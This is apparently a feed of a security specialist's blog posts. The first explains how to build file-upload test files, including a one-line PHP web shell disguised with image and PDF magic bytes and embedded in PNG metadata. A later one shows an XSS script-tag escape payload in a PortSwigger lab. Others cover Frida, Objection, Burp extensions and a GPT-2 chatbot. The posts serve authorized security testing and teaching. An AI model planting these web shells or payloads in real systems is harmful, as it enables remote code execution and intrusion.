Forem: whatminjacodes [she/they]

How to Create Security Test Files for File Upload

whatminjacodes [she/they] — Thu, 22 May 2025 06:43:37 +0000

I created a bunch of test files for security testing file upload functionalities and decided to write this walkthrough on how each file was created!

You can also download the test files from my GitHub, but hopefully people doing security testing don't download random files from the internet :D Instead, it's better to understand how the files work and create them from scratch.

If you're not familiar with file upload testing in general, you can for example read the PortSwigger tutorial about it.

So here are the instructions on how to create these test files yourself.

File upload test files

Here's the list of files covered in this walkthrough:

regular-excel-document.xlsx
regular-pdf-document.pdf
regular-png-file.png
regular-text-document.txt
regular-word-document.docx
eicar-text-document.txt
eicar-excel-document.xlsx
eicar-word-document.docx
php-shell.php
php-shell-directly-in-image.png
php-shell-added-to-end-png-magic-bytes.php
php-shell-with-jpeg-magic-bytes.php
php-shell-with-pdf-magic-bytes.php
png-file-with-php-payload-in-comment-metadata.png
php-shell-with-php-payload-in-png-comment-metadata-png-magic-bytes.php

Regular files

These are files that don’t have anything special in them.

The Excel file is just a regular spreadsheet created in Excel with some text and a =1+1 calculation.
The Word document is created with Word and includes some text.
The PDF file is exported from the Word document above and also contains some text.
The text document is simply a .txt file with some text in it.
The .png file is just a small image file.

Sometimes you just need to try the file upload works as intented and the best way to do that is to use files the service is expecting to get.

EICAR files

⚠️ Important note: EICAR files will likely trigger your antivirus software. However, these are non-malicious files. It's a good idea to create them inside a VM or exclude the folder where you're creating them from your antivirus scans.

What is EICAR?

The EICAR Anti-Virus Test File is a file designed for testing antivirus software without using real malware. It’s a benign file that gets flagged as malicious by antivirus engines. EICAR files can be used to check whether file uploads are scanned for malware.

The file is a legitimate DOS program made up of 68 printable ASCII characters. If run, it prints the message "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!".

eicar-text-document.txt

Create a new text document and paste the following string into it:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

eicar-excel-document.xlsx

Create a new Excel document, go to Insert → Text → Object → Create from File, and attach the previously created EICAR text file. Then save the document.

eicar-word-document.docx

Create a new Word document, go to Insert → Object → Create from File, and attach the previously created EICAR text file. Save the document.

PHP shells

The goal of uploading a PHP shell is to test whether the application allows the upload of executable code and whether that code can actually be executed. These are simple examples, so you should modify the payloads to suit your specific test environment.

php-shell.php

Create a new text file and paste the following code into it:

<?php system($_REQUEST['cmd']); ?>

Save the file and rename it to .php, or use the following Linux command to create the file:

echo '<?php system($_REQUEST['cmd']); ?>' >> php-shell.php

php-shell-directly-in-image.png

Same as above, but save the file with a .png extension, or use:

echo '<?php system($_REQUEST['cmd']); ?>' >> php-shell-directly-in-image.png

PHP shells using magic bytes

Magic bytes are the first few bytes of a file and are used to identify the file type. They’re also known as the file signature.

By modifying the magic bytes, we can make it look like we've uploaded for example an image, when it actually is a PHP shell.

php-shell-added-to-end-png-magic-bytes.php

Create this file by appending the payload to the end of a regular .png file and renaming it:

echo '<?php system($_REQUEST['cmd']); ?>' >> regular-png-file.png && mv regular-png-file.png php-shell-added-to-end-png-magic-bytes.php

That command first writes <?php system($_REQUEST['cmd']); ?> to a file that is named regular-png-file.png by using echo and >> and then runs the command mv, which is used to rename the file.

php-shell-with-jpeg-magic-bytes.php

Use a hex editor to change the first bytes of php-shell.php to:

FF D8 FF DB

These bytes make it look like the file is a .jpeg. I used hexedit for changing the bytes and xxd for checking if the change was successful.

⚠️ You may need to add a few characters to the beginning of the file before the payload, as changing the initial bytes might overwrite part of it.

php-shell-with-pdf-magic-bytes.php

Change the first bytes of php-shell.php to:

25 50 44 46 2D

This makes the file appear to be a .pdf.

⚠️ Again, you may need to insert few characters to prevent the payload from being discarded.

png-file-with-php-payload-in-comment-metadata.png

Use exiftool to add a PHP shell payload as a comment in a PNG image:

exiftool -comment='<?php system($_REQUEST['cmd']); ?>' png-file-with-php-payload-in-comment-metadata.png

regular-png-file.png can be used. I renamed it to png-file-with-php-payload-in-comment-metadata.png so it would be clear which file contains what.

php-shell-with-php-payload-in-png-comment-metadata-png-magic-bytes.php

Use exiftool to add a PHP shell payload as a comment in a PNG image:

exiftool -comment='<?php system($_REQUEST['cmd']); ?>' png-file-with-php-payload-in-comment-metadata.png

The same as above but rename the .png file to .php. The magic bytes will still correspond to PNG, but the file will be .php.

Background

I hope this tutorial was useful to you! As an Information Security Specialist at 2NS, I get to learn something new about cybersecurity every day. Through this blog, I aim to share tools and techniques that I find valuable in my work, hoping to help others in the field.

Follow me on Instagram @minjahakkeroi for a behind-the-scenes look at my work as an ethical hacker, and to learn more cybersecurity tips and insights!

Mobile Security Tools part 3: Objection

whatminjacodes [she/they] — Fri, 01 Nov 2024 11:39:15 +0000

Background

As an Information Security Specialist at 2NS, I get to learn something new about cybersecurity every day. Through this blog, I aim to share insights, tools, and techniques that I find valuable in my work, hoping to help others in the field.

In this post, I’ll be going through how to use Objection!

Here's the previous blog posts on Mobile Security Tools-series:

Part 1: scrcpy
Part 2: Frida

Let's get started!

What is objection?

Objection is a runtime mobile exploration toolkit, powered by Frida. I wrote a blog post that explains what Frida is and how it can be setup on Android. You can find it from here.

It supports both iOS and Android.

Some of the features:

Inspect and interact with container file systems.
Bypass SSL pinning.
Dump keychains.
Perform memory related tasks, such as dumping & patching.
Explore and manipulate objects on the heap.

Tutorial

Let's install and use Objection next.

Prerequisites

Objection can be used without rooting your phone, but for the sake of this tutorial, it is assumed you also have a rooted device. I used Magisk for rooting my phone.

My setup:
A rooted Pixel 6a
Android 13
Ubuntu 22.04.3 LTS
Android Platform Tools downloaded

If you are new to adb, I recommend you to first read what it is.

Frida server needs to be setup and running. You can follow my tutorial to get that done.

Install objection

Run the following command to install objection:

sudo pip install objection

And that's it! You can test everything works as intended by calling the following command on terminal:

objection -g "com.android.settings" device-type

That command should print some basic information about the device in use.

Testing with an app

We can use Purposefully Insecure and Vulnerable Android Application to practice how Objection works.

Download the project from GitHub and extract the files. Go to platform-tools and use adb to install the .apk file:

./adb install /PATH-TO-FILE/pivaa.apk

You can use pwd to get the path to a folder you are currently in.

Next attach objection to the app we just installed. You can find the name of the package using find-command on the adb shell:

su
cd /data/app
find -name "*<name>*"

su: superuser privileges
cd /data/app: folder that has all the installed applications
find -name "*<name>*": switch <name> to the app name you are trying to find, such as pivaa (find -name "*pivaa*") to find the name of the package.

Attach Objection:

objection -g com.htbridge.pivaa explore

The previous command opens an interactive shell that is attached to the target application.

Run the following command in the objection shell:

env

This command should show you information about different data storage locations the application might be using. By doing this we can be sure our connection is working. Objection has now been attached to the application!

What's next?

There's lots that can be done using Objection. Some good sources to learn more are listed here:

I hope this blog post helped you to get started with Objection!

Follow me on Instagram @whatminjahacks for a behind-the-scenes look at my work as an Information Security Specialist at 2NS, and to learn more cybersecurity tips and insights!

Practical Example of Escaping XSS Context

whatminjacodes [she/they] — Mon, 30 Sep 2024 10:14:54 +0000

In this post, I’ll show an example of a reflected XSS vulnerability where the user input is reflected inside a JavaScript context.

Understanding Context in Cross-Site Scripting (XSS)

In Cross-Site Scripting (XSS), context refers to two main factors, according to Portswigger:

The location where user-controlled data is reflected on the web page.
Any input validation or processing applied to that data by the web application.

The idea is that by identifying where the data appears on the page (its context), you can determine how to escape from that specific context and inject JavaScript code to, for example, prompt an alert box. Triggering an alert box is a common technique used to demonstrate a Proof of Concept (PoC) for an XSS vulnerability on a webpage.

What is "Escaping" in XSS?

In XSS attacks, escaping refers to the technique of breaking out of a given context to execute malicious code. For example, if user input is reflected inside an HTML attribute, you can attempt to break out of that attribute and insert executable JavaScript code. The goal is to inject code in a way that alters the structure of the existing web page or script, allowing you to control what gets executed.

By understanding how input is handled in the web application, you can figure out which characters are needed to break out of the context (like closing a tag) and where to inject your malicious script.

Different XSS Contexts

XSS can occur in various contexts, such as inside HTML elements, attributes, or JavaScript code blocks. To discover XSS vulnerabilities, it's important to understand how the data is handled within the application and how to break out of that context to inject executable scripts.

The method for escaping depends on where the input is reflected:

HTML Tag Attribute Context: Your input is placed inside an HTML attribute (e.g., value="user input"). To escape from this, you might need to close the attribute value, close the tag, and introduce a new one.
HTML tags: Your input is placed inside an HTML tags (e.g., <div>user input</div>). When the XSS context is text between HTML tags, you might need to introduce some new HTML tags designed to trigger execution of JavaScript.
JavaScript Context: Your input is reflected inside a JavaScript block (e.g., var data = 'user input';). When the XSS context involves existing JavaScript in the response, various scenarios can occur, each requiring specific techniques to successfully exploit the vulnerability.

The method for escaping depends on where the input is reflected, which is why understanding the context is crucial for exploiting XSS.

Practical Example of Escaping XSS Context

This example is based on PortSwigger's lab called "Reflected XSS into a JavaScript string with single quote and backslash escaped" but it's similar to an XSS vulnerability I discovered during a security assessment. You can also open the lab and test this yourself if you want to!

After opening the lab, we see a webpage that has a search bar on it. When we search for "TestInput" on the search bar, we get "0 search results for 'TestInput'" as a result. After doing a search, you can right-click on the page and choose "Inspect" (on Firefox) to search if the input we send is reflected on the code of the page.

In this case, we notice the "TestInput" is indeed reflected and we can see it is inside <script> tags:

<script>
    var searchTerms = 'TestInput';
    document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>

We can then try what happens by sending <script>alert("Test")</script> on the search bar:

We notice that the end part of the previous <script> block is now visible on the UI and that inside the <script> block is now the following:

<script>
    var searchTerms = '<script>alert("Test")
</script>

As the rest of the code block is now out of the <script> tag, we can determine that we were able to close the <script> tag early and the rest of the code is then shown on the UI.

Let's try closing the <script> tag first like this </script><script>alert("Test")</script> and then call the script for triggering an alert box:

As you can see from the screenshot above, the escape was successful and we were able to trigger the alert box!

Btw, you can also achieve this same result by adding the </script><script>alert("Test")</script> on the URL and sending the request like that:

That's it!

I wrote this blog post to demonstrate that it's possible to find these "simple" XSS vulnerabilities in real-world services. I also want to remind you that working through lab examples is not pointless! I’ve sometimes felt that way myself, especially since the lab environments are often designed to be intentionally vulnerable. But these exercises really do help build the skills needed for real-world testing.

Background

Follow me on Instagram @whatminjahacks for a behind-the-scenes look at my work as an ethical hacker, and to learn more cybersecurity tips and insights!

Testing Authorization with Auth Analyzer in Burp Suite

whatminjacodes [she/they] — Wed, 18 Sep 2024 10:17:05 +0000

Background

In this post, I’ll be discussing the Auth Analyzer extension and how it can be used to effectively test authorization in web applications.

What is Auth Analyzer?

Auth Analyzer is a Burp Suite extension designed to help security testers evaluate authorization mechanisms in web applications. It automates the process of checking access control vulnerabilities, such as horizontal and vertical privilege escalation. The extension allows testers to define multiple user roles and automatically send requests from these sessions to verify if a user can perform actions or access resources outside their intended permissions.

Tutorial

Let's install and use Auth Analyzer next.

Prerequisites

This tutorial will not cover how to set up the PwnFox extension for your browser and Burp Suite. I have written another tutorial on that, so please check it out first, and then come back here: How to use PwnFox in Burp Suite.

My setup:

Ubuntu 22.04.4 LTS
Burp Suite Community Edition (free version) with PwnFox extension installed
Firefox browser with PwnFox extension installed

Install Auth Analyzer Extension

Installing the Auth Analyzer extension is simple! Just open Burp Suite, go to Extensions -> BApp Store, find Auth Analyzer from the list of available extensions, and click "Install".

This will add a new tab to Burp Suite, as seen in the screenshot above.

Create an Account for the Test Webpage

Let's use OWASP Juice Shop as an example to use Auth Analyzer with. OWASP Juice Shop is an intentionally insecure web application that "can be used in security trainings, awareness demos, CTFs, and as a guinea pig for security tools!"

Open a new tab container with a color of your choice from the PwnFox browser extension, navigate to OWASP Juice Shop (https://juice-shop.herokuapp.com/#/), and go to Account -> Login from the top right corner of the page.

Then click "Not yet a customer?".

Add some details to the registration form and click "Register." You don't need to use any real information.

After this, you should be able to log in using the credentials you chose. Do the same with another container tab and create a new account with different information. Remember to choose a different tab color so the container will open a new session.

Now you have two different user sessions open on two different container tabs. Go to Burp Suite and open Proxy -> HTTP history to ensure you get traffic highlighted with two different colors.

Creating Sessions in Auth Analyzer

Next, we can set up the Auth Analyzer extension in Burp Suite. Go to the Auth Analyzer tab in Burp.

You can double-click on "user1" to rename the session to something you want. I created two users, example-user-1 and example-user-2, so I'll just stick to "user1" and "user2" as my session names.

Then go to Proxy -> HTTP history and find a request that has a Cookie header set. I chose the "GET /rest/user/whoami" request and copied the entire Cookie header.

Go back to the Auth Analyzer tab and paste the copied cookie into "Header(s) to Replace."

Then click on the three dots next to "user1" and select "Add New Session." Give the session a name and copy the cookie of another user into "Header(s) to Replace", similarly as we did with "user1."

Now you have two different sessions set in Auth Analyzer! When we start the extension, it will send requests to the website using both cookies.

On the right side of the extension, there are some settings. You can add the website you are testing to scope, so the extension will not send the cookies to any external services. One way to do this is by going to the Target tab in Burp.

Go to Target -> Site map to see a list of websites you have browsed while Burp Suite has been proxying traffic. Right-click on "https://juice-shop.herokuapp.com" and select "Add to scope."

You will see a prompt asking if you want Burp to stop sending out-of-scope items to the history and other Burp tools. Click "Yes."

Now we can go back to the Auth Analyzer tab and click the "Analyzer Stopped" button to start the extension.

Testing Access Control with Auth Analyzer

Go back to your browser and start navigating the website. The Auth Analyzer extension tab in Burp should start receiving traffic.

The extension will show if the requests sent with different cookies return the "same," "similar," or "different" responses.

If the response is "same," it means both sessions were able to see the same response to the sent request. "Similar" has some similarities but is not exactly the same, and "different" means the response was different for both users.

Click one of the requests on the list. This will show the request and response sent using the different sessions. You can click "Compare view" to see the requests of both users at the same time.

As seen in the screenshot above, we can see the request to "/profile" was "same" for "user1" and "different" for "user2." I was using the session of "user1" when navigating to the profile page on the browser, so the response for the request was expected to be the "same" for "user1." It would be an issue if the response for "user2" was also tagged as "same," because it would mean that "user2" was able to see the profile of "user1." Though I guess getting a "500 Internal Server Error" would also be an issue on a real page :D

But this is the basics of how you can test for issues in authorization and access control using Auth Analyzer! Remember to stop the extension after you have navigated through the webpage on the browser window so it will not keep sending multiple requests to the website constantly.

By the way, you can use Auth Analyzer to also check authorization for unauthenticated users by creating a new session and just leaving the Cookie header empty!

That's it!

I hope this blog post helped you to understand how Auth Analyzer can be used for testing authorization and access control!

Follow me on Instagram @whatminjahacks for a behind-the-scenes look at my work as an Information Security Specialist at 2NS, and to learn more cybersecurity tips and insights!

How to use PwnFox with Burp Suite

whatminjacodes [she/they] — Wed, 11 Sep 2024 11:34:53 +0000

I'm working as an Information Security Specialist at 2NS and this time I wanted to teach you how to use PwnFox extension with Burp Suite!

What is PwnFox, and why is it used?

PwnFox is a Firefox and Burp Suite extension that provides useful tools for security testing websites. It can be especially helpful when performing access control tests with the Auth Analyzer Burp extension (I have published a blog post about this too: Testing Authorization with Auth Analyzer in Burp Suite).

PwnFox utilizes Firefox Containers to create separate environments for different user roles or sessions during security testing. Firefox Containers allow you to open new tabs in separate containers, each with its own isolated environment, including separate cookies, local storage, cache, and site data. This means that cookies set in one container are not accessible in another, and each container acts like a separate browser profile.

If you want to learn more about how Firefox Containers work, you can read the tutorial written by Mozilla: How to use Firefox containers.

What PwnFox does is color-code and tag HTTP traffic based on the originating container. This makes it easy to see which requests are coming from which profile and allows for more precise traffic analysis. Burp Suite will highlight the traffic coming from each container to match the color of the container you are using.

Tutorial

Let's install and use PwnFox next.

Prerequisites

This tutorial will not cover how Burp Suite is used. I recommend having at least a basic understanding of Burp Suite before following this tutorial. PortSwigger has created a great tutorial series that you can start with: Burp Suite Professional video tutorials.

My setup:

Ubuntu 22.04.4 LTS
Clean installation of Burp Suite Community Edition (free version)
Clean installation of Firefox

Setup PwnFox Browser Extension

Let's start by installing the PwnFox browser extension.

Open Firefox and go to Settings -> Extensions and Themes, and search for the PwnFox extension.

Open the installed extension and check "Proxify only containers tabs" and "Enable."

This setting ensures that only the network traffic from new tabs opened by clicking on a color under "New container tab" in the extension will be sent to Burp Suite.

Install PwnFox Burp Suite Extension

Next, we need to install the extension in Burp Suite.

Go to Github and download the latest PwnFox.jar file.

Open Burp Suite and go to Extensions -> Installed -> Add.

Select the downloaded PwnFox.jar file and click "Next". The following screen should display "PwnFox loaded" if the setup did not encounter any issues. Click "Close".

Now, the setup is complete!

Using PwnFox with Burp Suite

So, how do you actually use this extension?

First, open a new container tab from the PwnFox browser extension. Choose any color you like.

I chose the green one, as you can see from the address bar and on top of the "New Tab."

If you open another tab with a different color, it will be easy to identify which container you are using.

Open Burp Suite and go to Proxy -> HTTP history tab. Try navigating to any website using two different container tabs.

You should see network traffic that is highlighted according to the container color you chose.

That's it!

I hope this blog post helped you to understand what PwnFox extension is and how it can be installed!

You can also follow my Instagram @whatminjahacks if you are interested to see more about my days as an Information Security Specialist at 2NS and learn more about cyber security with me!

List of All My Blog Posts - with direct links

whatminjacodes [she/they] — Wed, 12 Jun 2024 13:44:18 +0000

I wanted to pin a list of all my blog post so those are easier to find. So here's a list of everything that I have written!

I will also update this list whenever I publish a new blog post :)

You can also follow me on Instagram @whatminjahacks for a behind-the-scenes look at my work as an Information Security Specialist at 2NS, and to learn more cybersecurity tips and insights!

Mobile Security Tools part 2: Frida

whatminjacodes [she/they] — Fri, 07 Jun 2024 10:59:17 +0000

Mobile Security Tools-series:

Part 1: scrcpy

Part 2: Frida

What is Frida?

Frida is a free and open-source instrumentation toolkit that can be used to test and evaluate Android apps.

It can technically be used without rooting a phone, but to make things easier, you should have a rooted phone. Frida allows users to modify and inject code into running applications in order to analyze their behavior.

It can be used for tasks such as reverse engineering, debugging, and security testing.

There are many features, such as:

modifying original binary images
bypassing SSL pinning
decrypting encrypted traffic
analyzing applications
runtime manipulation

Tutorial

Let's install and use Frida next. Note that you will need a rooted phone for this.

Prerequisites

You need a rooted Android phone to follow this tutorial. I used Magisk for that, but this tutorial won't go through the process of rooting your phone.

My setup:
A rooted Pixel 6a
Android 13
Ubuntu 22.04.3 LTS
Android Platform Tools downloaded

If you are new to adb, I recommend you first read what it is.

Install Frida

We will use pip, a package manager for Python packages, to install Frida. If you don't have pip, install it by running:

sudo apt install python3-pip

You can ensure the installation was successful by checking the version of pip:

pip --version

Install Frida using pip:

sudo pip install frida-tools

Check the version of Frida:

frida --version

Find processor version of your phone

To install the correct version of the Frida server on your phone, you need to know the processor version.

Plug your phone into your computer, navigate to the platform-tools folder, and open a device shell:

./adb shell

Run the following command to get the version:

getprop ro.product.cpu.abi

Download Frida server

Go to Frida Github and find the link to a Frida server that matches both the Frida version installed and the processor version of your phone.

Click Show all assets to find Frida server.

So for example in my case, Frida version was 16.1.4 and the processor version was arm64-v8a. So I chose frida-server-16.1.4-android-arm64.xz from the list.

Open another tab in the terminal and download the chosen Frida server:

wget https://github.com/frida/frida/releases/download/[YOUR-VERSION]/frida-server-[YOUR-VERSION]-android-arm64.xz

Extract the downloaded package:

xz -d frida-server-[YOUR-VERSION]-android-arm64.xz

Lastly, push the extracted binary to the device. Navigate to the platform-tools folder and push the file to the /data/local/tmp folder on your phone:

./adb push /path-to-file/frida-server-[YOUR-VERSION]-android-arm64 /data/local/tmp

If you don't know the path, you can use the pwd command in the terminal to find the current folder's path.

Execute Frida server on the device

In the adb shell tab on the terminal, switch to the root user on the device:

su

Navigate to the folder where you pushed the Frida server file:

cd /data/local/tmp

Give the file execute permission:

chmod +x frida-server-[YOUR-VERSION]-android-arm64

Run Frida server:

./frida-server-[YOUR-VERSION]-android-arm64 &

That's it!

This was a tutorial on how to set up Frida on your Android phone. Next time I will show you what you can use Frida for, but this was all for now!

You can also follow my Instagram @whatminjahacks if you are interested to see more about my days as a Cyber Security consultant and learn more about cyber security with me!

Building a Simple Chatbot using GPT model - part 2

whatminjacodes [she/they] — Fri, 31 May 2024 07:16:09 +0000

On the first part of this series, we set up the environment by installing Ubuntu, Python, Pip and Virtual Environment. Now we can get started with the actual chatbot.

Install Required Libraries

Hugging Face is a company and community platform making AI accessible through open-source tools, libraries, and models. It is most notable for its transformers Python library, built for natural language processing applications. This library provides developers a way to integrate ML models hosted on Hugging Face into their projects and build comprehensive ML pipelines.

PyTorch is a powerful and flexible deep learning framework that offers a rich set of features for building and training neural networks.

To install the correct version of torch, you need to visit the PyTorch website and follow the instructions for your setup. For example, I chose the following:

PyTorch Build: Stable (2.3.0)
OS: Linux
Package: Pip
Language: Python
Compute Platform: CPU

These settings resulted to a following command:

pip3 install torch torchvision torchaudio --index-url https://download.pytorch.org/whl/cpu

It can take a while to install torch. After it is done, you can install transformers by running the following command:

pip3 install transformers

Developing a Simple Chatbot

For this example, we'll use the GPT-2 model from Hugging Face.

Here is a basic script to for creating a chatbot:

import torch
from transformers import GPT2LMHeadModel, GPT2Tokenizer

# Load the pre-trained GPT-2 model and tokenizer
model_name = "gpt2-large"
tokenizer = GPT2Tokenizer.from_pretrained(model_name)
model = GPT2LMHeadModel.from_pretrained(model_name)

# Set the model to evaluation mode
model.eval()

def generate_response(prompt, max_length=100):
    input_ids = tokenizer.encode(prompt, return_tensors="pt")

    # Generate response
    with torch.no_grad():
        output = model.generate(input_ids, max_length=100, num_return_sequences=1, pad_token_id=tokenizer.eos_token_id)

    response = tokenizer.decode(output[0], skip_special_tokens=True)
    return response

print("Chatbot: Hi there! How can I help you?")
while True:
    user_input = input("You: ")
    if user_input.lower() == "exit":
        print("Chatbot: Goodbye!")
        break

    response = generate_response(user_input)
    print("Chatbot:", response)

Let's go through the code together.

import torch
from transformers import GPT2LMHeadModel, GPT2Tokenizer

The first line imports the PyTorch library and the second imports two classes from transformers library: GPT2LMHeadModel and GPT2Tokenizer. GPT2LMHeadModel is used to load the GPT-2 model, and GPT2Tokenizer is used to preprocess and tokenize text input.

# Load the pre-trained GPT-2 model and tokenizer
model_name = "gpt2-large"
tokenizer = GPT2Tokenizer.from_pretrained(model_name)
model = GPT2LMHeadModel.from_pretrained(model_name)

model_name = "gpt2-large": Sets the variable model_name to the string gpt2-large, indicating the specific model to be loaded.
tokenizer = GPT2Tokenizer.from_pretrained(model_name): Loads the pre-trained tokenizer corresponding to the GPT-2 model. The tokenizer is responsible for converting text to token IDs that the model can process.
model = GPT2LMHeadModel.from_pretrained(model_name): Loads the pre-trained GPT-2 model using the specified model name. The from_pretrained method downloads the model's weights and configuration.

# Set the model to evaluation mode
model.eval()

In PyTorch, the model.eval() method is used to set the model to evaluation mode. This is important for certain layers and operations that behave differently during training and evaluation.

def generate_response(prompt, max_length=100):
    input_ids = tokenizer.encode(prompt, return_tensors="pt")

    # Generate response
    with torch.no_grad():
        output = model.generate(input_ids, max_length=100, num_return_sequences=1, pad_token_id=tokenizer.eos_token_id)

    response = tokenizer.decode(output[0], skip_special_tokens=True)
    return response

Then we define a function that takes a text prompt and an optimal maximum length for the generated text.

input_ids = tokenizer.encode(prompt, return_tensors="pt"): Encodes the text prompt into token IDs and returns a tensor suitable for PyTorch (hence return_tensors="pt"). This tensor will be used as input for the model.
with torch.no_grad(): This is a context manager that disables gradient calculation. We can disable them for this example to speed up the calculation and to reduce the memory usage.
output = model.generate(input_ids, max_length=100, num_return_sequences=1, pad_token_id=tokenizer.eos_token_id): Generates a response based on the input_ids. The generate method creates a sequence of tokens with a maximum length of max_length. num_return_sequences=1 specifies that only one sequence should be generated and pad_token_id specifies the padding token ID should be the same as the end-of-sequence (EOS) token ID defined by the tokenizer. When generating text, models use the EOS token to signify the conclusion of a sentence.
response = tokenizer.decode(output[0], skip_special_tokens=True): This method is used to convert the generated sequence of token IDs back into a human-readable string. skip_special_tokens parameter ensures that special tokens (like padding or end-of-text tokens) are not included in the final decoded string.

print("Chatbot: Hi there! How can I help you?")
while True:
    user_input = input("You: ")
    if user_input.lower() == "exit":
        print("Chatbot: Goodbye!")
        break

    response = generate_response(user_input)
    print("Chatbot:", response)

print("Chatbot: Hi there! How can I help you?"): Prints an initial greeting message from the chatbot to the console.
while True:: Is the main loop of the chatbot. This will allow continuous conversation with the chatbot until the user sends "exit" command.
response = generate_response(user_input): This calls the function we defined above with the promt inserted by the user.
print("Chatbot:", response): And as a last step, the response is printed on the console.

Running the Script

Save the script to a file, named for example simple-chatbot.py, and run it using:

python3 simple-chatbot.py

It can take a while for the script to run. Eventually you can chat with the chatbot. However, as seen in the conversation below, the chatbot has some trouble with its response.

Chatbot: Hi there! How can I help you?
You: Hello! How are you?
Chatbot: Hello! How are you?

I'm a little bit nervous. I'm not sure if I'm going to be able to do this, but I'm going to be able to do it. I'm going to be able to do it. I'm going to be able to do it. I'm going to be able to do it. I'm going to be able to do it. I'm going to be able to do it. I'm going to be able to do it
You:

Sometimes the chatbot is saying the same sentence over and over on same line, and sometimes it returned the response multiple times, each response on its own line. We can clean the reponse by adding a function that will split the response text into lines and checking if the line has repeated sentences:

import re

def remove_repeated_sentences(text):
    sentences = re.split(r'(?<!\w\.\w.)(?<![A-Z][a-z]\.)(?<=\.|\?)\s', text)
    unique_sentences = []
    for sentence in sentences:
        if sentence not in unique_sentences:
            unique_sentences.append(sentence)
        else:
            break  # Stop adding sentences after the first repetition
    return ' '.join(unique_sentences)

def clean_response(response_text, prompt):
    # Remove the prompt from the response
    stripped_response = response_text.replace(prompt, '').strip()

    # Split the stripped response text into lines
    lines = stripped_response.split('\n')

    combined_lines = " ".join(line.strip() for line in lines if line.strip())
    return remove_repeated_sentences(combined_lines)

Then on the generate_response function, we can call this clean_response function:

def generate_response(prompt, max_length=100):
    input_ids = tokenizer.encode(prompt, return_tensors="pt")

    # Generate response
    with torch.no_grad():
        output = model.generate(input_ids, max_length=100, num_return_sequences=1, pad_token_id=tokenizer.eos_token_id)

    response = tokenizer.decode(output[0], skip_special_tokens=True)
    **cleaned_response = clean_response(response, prompt)**

    return cleaned_response

Now the chatbot should generate responses that look good! There might still be some corner cases that I hadn't thought about, but those can then be added to the clean_response function.

The following is an example of a conversation I had with the chatbot:

Chatbot: Hi there! How can I help you?
You: Hello! How are you?
Chatbot: I'm so glad you're here.
You: That´s nice to hear!
Chatbot: I´m not sure if I´m going to be able to do it, but I´m going to try. I´m going to try to do it.
You: You can do it!
Chatbot: You can
You: What do you think about AI?
Chatbot: Let us know in the comments below! Images courtesy of Shutterstock, and Pixabay.
You: You are funny
Chatbot: .
You:

It doesn't necessarily make that much sense all the time since this is just a simple example, but at least now you know how to develop a chatbot!

Here's the finalized code so you can better see what was changed from the first version:

import re
import torch
from transformers import GPT2LMHeadModel, GPT2Tokenizer

# Load the pre-trained GPT-2 model and tokenizer
model_name = "gpt2-large"
tokenizer = GPT2Tokenizer.from_pretrained(model_name)
model = GPT2LMHeadModel.from_pretrained(model_name)

# Set the model to evaluation mode
model.eval()

def remove_repeated_sentences(text):
    sentences = re.split(r'(?<!\w\.\w.)(?<![A-Z][a-z]\.)(?<=\.|\?)\s', text)
    unique_sentences = []
    for sentence in sentences:
        if sentence not in unique_sentences:
            unique_sentences.append(sentence)
        else:
            break  # Stop adding sentences after the first repetition
    return ' '.join(unique_sentences)

def clean_response(response_text, prompt):
    # Remove the prompt from the response
    stripped_response = response_text.replace(prompt, '').strip()

    # Split the stripped response text into lines
    lines = stripped_response.split('\n')

    combined_lines = " ".join(line.strip() for line in lines if line.strip())
    return remove_repeated_sentences(combined_lines)


def generate_response(prompt, max_length=100):
    input_ids = tokenizer.encode(prompt, return_tensors="pt")

    # Generate response
    with torch.no_grad():
        output = model.generate(input_ids, max_length=100, num_return_sequences=1, pad_token_id=tokenizer.eos_token_id)

    response = tokenizer.decode(output[0], skip_special_tokens=True)
    cleaned_response = clean_response(response, prompt)

    return cleaned_response

print("Chatbot: Hi there! How can I help you?")
while True:
    user_input = input("You: ")
    if user_input.lower() == "exit":
        print("Chatbot: Goodbye!")
        break

    response = generate_response(user_input)
    print("Chatbot:", response)

That's it!

In this blog post, we developed a simple chatbot and cleaned the response so it looks a bit better!

You can also follow my Instagram @whatminjahacks if you are interested to see more about my days as a Cyber Security consultant and learn more about cyber security with me!

Building a Simple Chatbot using GPT model - part 1

whatminjacodes [she/they] — Fri, 24 May 2024 06:40:16 +0000

I have been wanting to understand the vulnerabilities related to Large Language Model (LLM) applications and generative AI, so I thought a good way to understand these in practice would be by first developing my own chatbot.

So here's a two-part series where I go through what LLMs are, how to set up a development environment, and how to actually develop a chatbot.

This first post helps you set up the environment, as well as explains what LLMs are. In a post next week, I will go through the development of the chatbot.

What are LLMs?

LLM stands for Large Language Model. It is a system designed to understand and generate human-like text. LLMs are trained with vast amounts of data from various sources, such as books, articles, and websites. This allows the algorithm to predict what sequences of words are probable responses to a user-provided input.

One example of a system using an LLM, which probably everyone has heard about by now, is ChatGPT. It is an AI system that uses natural language processing to create a conversation with the user and utilizes OpenAI's Generative Pre-trained Transformer (GPT), a neural network machine learning model.

Setup the Environment

Now that you have the background info for this series, let's set up our environment.

I'm using WSL 2 with Ubuntu 20.04 LTS, so if you are not using the same setup, the commands I use might be a little different on your distribution.

1. Update and Upgrade Ubuntu

Open your Ubuntu terminal and run the following commands to update and upgrade your package lists:

sudo apt update
sudo apt upgrade

This will ensure you have the latest software updates.

2. Install Python

This guide will use Python and pip to run the required Python scripts and manage packages. Most Ubuntu installations come with Python pre-installed. Verify the installation by running the following commands:

python3 --version
pip3 --version

If Python or pip is not installed, install them using this command:

sudo apt install python3 python3-pip

3. Install Virtual Environment Tools

Creating a virtual environment is a best practice to manage dependencies for your projects. This will create an isolated environment that prevents conflicts between different projects that may require different versions of the same package.

Install venv by running:

sudo apt install python3-venv

4. Create a Virtual Environment

Navigate to the directory where you want to create your project and set up a virtual environment:

mkdir name-of-directory
cd name-of-directory
python3 -m venv venv-name

mkdir name-of-directory: Creates a new directory called name-of-directory for your project. Change the name to what you want it to be.
cd name-of-directory: Changes the current directory to the directory you just created.
python3 -m venv venv-name: Creates a virtual environment named venv-name in the directory. Change the name to what you want it to be.

5. Activate the Virtual Environment

Activate the virtual environment with the following command, changing venv-name to the one you chose when creating the virtual environment in the step above:

source venv-name/bin/activate

You should see the virtual environment name (e.g., venv-name) in your terminal prompt, indicating that it's activated.

(venv-name) example@ubuntu:/name-of-directory$

6. Upgrade pip

Ensure that pip is up to date:

pip3 install --upgrade pip

That's it!

